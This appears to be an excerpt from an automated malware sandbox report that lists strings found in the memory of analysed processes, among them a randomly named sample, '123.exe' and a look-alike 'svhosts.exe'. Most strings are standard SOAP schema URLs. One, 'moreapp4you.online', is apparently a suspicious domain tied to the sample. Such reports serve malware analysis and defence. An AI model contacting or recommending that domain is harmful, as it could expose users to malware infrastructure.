Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: svchost.exe, 00000006.00000003.1499747534.00000200BEB00000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000003355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://moreapp4you.online
Source: svchost.exe, 00000011.00000002.3795315046.000001496FA53000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://passport.net/tb
Source: 123.exe, 00000028.00000002.2069152736.000000000154E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://purl.oen
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultH
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.2240738222.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794919953.000001496F588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794786381.000001496F56F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.3821279083.0000000002851000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002CF1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794886413.000001496F580000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794919953.000001496F588000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scB4=
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scB4=n
Source: svchost.exe, 00000011.00000002.3794919953.000001496F588000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scst
Source: svchost.exe, 00000011.00000002.3794648716.000001496F537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3794733578.000001496F55F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: 1Vkf7silOj.exe, 00000001.00000002.1586636370.0000000002C99000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3791192728.000001496EC2F000.00000004.00000020.00020000.00000000.sdmp, 123.exe, 00000028.00000002.2069186496.0000000002D84000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000029.00000002.3808582433.0000000002C78000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.1952028774.000001496F56D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue600
Source: svchost.exe, 00000011.00000003.1760226835.000001496F56E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuels
